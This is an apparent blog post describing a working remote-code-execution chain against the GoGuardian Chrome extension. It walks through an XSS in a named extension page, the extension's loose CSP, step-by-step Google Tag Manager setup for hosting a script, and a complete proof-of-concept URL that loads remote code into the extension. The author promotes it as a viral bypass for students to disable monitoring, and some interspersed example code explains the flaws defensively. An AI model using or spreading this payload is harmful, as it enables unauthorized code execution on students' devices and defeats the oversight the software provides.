How I achieved RCE in GoGuardian and why it'll be the next viral exploit


Alright, so what's RCE? It means Remote Code Execution. Basically, it's when somebody gets to run code on your device in a place where they should not be allowed to run code.

For example, imagine visiting a website. Suddenly, GoGuardian disables itself. I mean, that surely shouldn't be possible, right?

But it is.


In this case, visiting a simple URL will run code inside GoGuardian. I'll reveal the full URL at the end of the article, and the rest of the article will be how exactly I built this URL, as well as the steps you'd need to do it yourself.

If you want a URL to be able to run code, the first thing you'll need is an XSS (Cross-Site Scripting) vulnerability. Basically, a website or app takes user input and writes it into the page as actual code instead of text.

So I found an XSS vulnerability in GoGuardian. Took around ten minutes.

chrome-extension://haldlgldplgnggkjaafhelgiaglafanh/teacher/lesson-plans/blocked.html?cs=[1,{"name":"<b>robert</b>"}]
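To make the bug class concrete, here is an added example (not GoGuardian's code, which the article does not show) reconstructing the pattern behind the `cs=` parameter: the page parses the JSON and drops the `name` field into markup. The parameter format comes from the URL above; the function names and the page template are assumptions, and the hardened version escapes the value before interpolating it.

```javascript
// Added example: reconstruction of the bug pattern, not GoGuardian's own code.
// blocked.html reads ?cs=[1,{"name":"..."}] and shows the name to the user.

function parseCsParam(search) {
  const raw = new URLSearchParams(search).get("cs");
  if (raw === null) return null;
  try {
    const parsed = JSON.parse(raw);
    // Expected shape (from the article's URL): [1, { "name": "..." }]
    if (!Array.isArray(parsed) || typeof parsed[1] !== "object" || parsed[1] === null) {
      return null;
    }
    return parsed[1];
  } catch {
    return null; // malformed JSON is treated as "no name"
  }
}

function nameFrom(search) {
  const cs = parseCsParam(search);
  return cs && typeof cs.name === "string" ? cs.name : "";
}

// Vulnerable pattern: the untrusted string is concatenated into HTML, so
// <b>robert</b> (or an <iframe>) is rendered as markup instead of text.
function renderBlockedUnsafe(search) {
  return `<p>Blocked by ${nameFrom(search)}</p>`;
}

// Hardened pattern: escape the HTML metacharacters before interpolation.
// (In a real page, assigning element.textContent avoids building markup at all.)
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

function renderBlockedSafe(search) {
  return `<p>Blocked by ${escapeHtml(nameFrom(search))}</p>`;
}

// Constructed query string mirroring the article's proof-of-concept URL.
const SAMPLE_QUERY = '?cs=[1,{"name":"<b>robert</b>"}]';
```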

Any URL starting with the chrome-extension://haldwhatever nonsense will have access to all of GoGuardian's permissions, including but not limited to the following:

Okay, so we can put HTML into a GoGuardian extension page. So now we have RCE, right?

Sadly, not yet.


CSP (Content Security Policy) exists. It tells Chrome not to run any scripts unless they are specifically allowed. By default, Chrome extensions get the strictest policy, but GoGuardian's is a little looser:

script-src 'self' https://ssl.google-analytics.com https://*.pusher.com 'unsafe-eval'; object-src 'self'

What this means is that the GoGuardian extension will still run scripts if they are served from https://ssl.google-analytics.com/ or from any subdomain of pusher.com (https://*.pusher.com).
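As an added example (not part of the article), a small script-src matcher shows which script URLs the quoted policy admits and which Chrome's default extension policy (`script-src 'self'; object-src 'self'`) would block. It handles `'self'`, exact origins and `*.host` wildcards only; it is not a full CSP implementation, and the extension origin is taken from the URLs in the article.

```javascript
// Added example: minimal script-src matcher, not the browser's CSP engine.

function parseScriptSrc(policy) {
  const directive = policy
    .split(";")
    .map((d) => d.trim())
    .find((d) => d.startsWith("script-src "));
  return directive ? directive.slice("script-src ".length).split(/\s+/) : [];
}

// Does one source expression (e.g. https://*.pusher.com) allow this URL?
function sourceAllows(expr, url, pageOrigin) {
  if (expr === "'self'") return url.protocol + "//" + url.host === pageOrigin;
  if (expr.startsWith("'")) return false; // 'unsafe-eval' etc. never match a URL
  const m = /^(https?):\/\/(\*\.)?([^/]+)$/.exec(expr);
  if (!m) return false;
  const [, scheme, wildcard, host] = m;
  if (url.protocol !== scheme + ":") return false;
  // *.pusher.com matches subdomains only, never pusher.com itself.
  if (wildcard) return url.hostname.endsWith("." + host);
  return url.hostname === host;
}

function scriptAllowed(policy, scriptUrl, pageOrigin) {
  const url = new URL(scriptUrl);
  return parseScriptSrc(policy).some((e) => sourceAllows(e, url, pageOrigin));
}

// The policy quoted in the article, and Chrome's default extension policy.
const GOGUARDIAN_CSP =
  "script-src 'self' https://ssl.google-analytics.com https://*.pusher.com 'unsafe-eval'; object-src 'self'";
const STRICT_CSP = "script-src 'self'; object-src 'self'";
const EXT_ORIGIN = "chrome-extension://haldlgldplgnggkjaafhelgiaglafanh";
const GTM_SCRIPT = "https://ssl.google-analytics.com/gtm/js?id=GTM-P4W948N";
```

The same Tag Manager URL is admitted by the looser policy and rejected by the default one, which is the whole difference the article turns on.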

So, um. Now I've gotta somehow find a JavaScript file on these domains that will run my script. Alternatively, you could use DNS spoofing (which [swamp] does), but the user has to set that up, which ruins the whole point of RCE.

My first hope was to find some sort of file upload, Script Gadget, or even a Subdomain Takeover (very illegal) on Pusher. But I couldn't find anything good, so I took a break for a couple of months.


But then (yesterday), with the help of an old bug report on GitHub, I found some vital information. There's a service called Google Tag Manager, which is used by websites for analytics and conversion tracking. One of its features is to allow you to run scripts within its framework. These scripts are also hosted on the Google Analytics domain.

Here's a quick setup tutorial (credit to The Greatest Giant#0110 for writing this out):

  1. Go to Google Tag Manager and press "Create Account".
  2. Fill in the details, select "Web" as the target platform, and click "Create".
  3. Go to the "Variables" tab on the left-hand menu.
  4. Make a new "User-Defined Variable" with "Custom JavaScript", and use something like the code below (a Custom JavaScript variable is an anonymous function whose return value becomes the variable):

     function () {
       alert(1);
       return "";
     }

  5. Save the variable and name it something like "yay".
  6. Go to the "Tags" section and create a new tag.
  7. Set the tag type to "Custom HTML".
  8. Put something like {{yay}} as the code, which will run the variable.
  9. Set "Initialization" as the trigger of the tag.
  10. Use the "Submit" button in the top-right and publish your workspace.

In the end, your JavaScript will be hosted at a URL like the one below:

https://ssl.google-analytics.com/gtm/js?id=GTM-P4W948N

You can find your own "GTM" code from the top bar of the Google Tag Manager site.


Full POC:

Okay, so now we have code hosted on the Google Analytics domain. And we have HTML injection in GoGuardian. And along with <iframe srcdoc>'s script-injecting capabilities, you can craft a full URL to run code as GoGuardian.

chrome-extension://haldlgldplgnggkjaafhelgiaglafanh/teacher/lesson-plans/blocked.html?cs=[1,{"name":"<iframe srcdoc=\"<script src='https://ssl.google-analytics.com/gtm/js?id=GTM-P4W948N'></script>\">"}]

The one above opens a menu called [swamp], which I coded a long time ago for bypassing stuff with a GoGuardian shell.


Is this bad for GoGuardian? Yes. 100%.

The cherry on top is the fact that teacher/* is in the extension's web_accessible_resources, meaning that normal websites can redirect to and even embed the vulnerable URL without you having a clue. On an unrelated note, GoGuardian also has access to all your cookies and location coordinates.
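The web_accessible_resources point is worth making concrete. The following is an added example, not GoGuardian's manifest: it checks whether a manifest v2 resource list exposes a given extension page to ordinary websites. The "teacher/*" entry is what the article reports; the hardened list is an assumed alternative that names only the individual files that actually need to be reachable from the web.

```javascript
// Added example: not GoGuardian's manifest. Checks which extension paths a
// manifest v2 web_accessible_resources list exposes to ordinary web pages.

// Chrome's entries are glob patterns; only "*" is a wildcard here.
function globToRegExp(pattern) {
  const escaped = pattern
    .replace(/[.+?^${}()|[\]\\]/g, "\\$&") // escape regex metacharacters
    .replace(/\*/g, ".*");                  // "*" matches any run of characters
  return new RegExp("^" + escaped + "$");
}

function isWebAccessible(manifest, path) {
  const list = manifest.web_accessible_resources || [];
  return list.some((pattern) => globToRegExp(pattern).test(path));
}

// Weak setting as reported in the article: the whole teacher/ tree is exposed,
// including the vulnerable page.
const WEAK_MANIFEST = {
  manifest_version: 2,
  web_accessible_resources: ["teacher/*"],
};

// Hardened setting (assumed): list only the files that web pages must load.
const HARDENED_MANIFEST = {
  manifest_version: 2,
  web_accessible_resources: ["teacher/icons/logo.png"], // hypothetical asset
};

const BLOCKED_PAGE = "teacher/lesson-plans/blocked.html";
```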

Some would say that this is a multi-thousand-dollar vulnerability. It could be used for very, very evil purposes. However, in my mind, bypassing beats money. And bypassing beats evil. It's like the world's unfairest rock-paper-scissors game.

Anyway, I think that this exploit will definitely spread quickly due to its ability to be embedded in normal websites. A classmate just tells you to "go to this website" and suddenly you have a menu in which you can disable all your extensions, assuming that you have GoGuardian. I've dubbed this menu-opening version of the exploit "[swamp] ULTRA", since the original [swamp] setup required DNS spoofing.

It'll be funny to see if the sysadmins can figure out how this works.

And it'll be funny to see how long it'll take for GoGuardian to fix it.
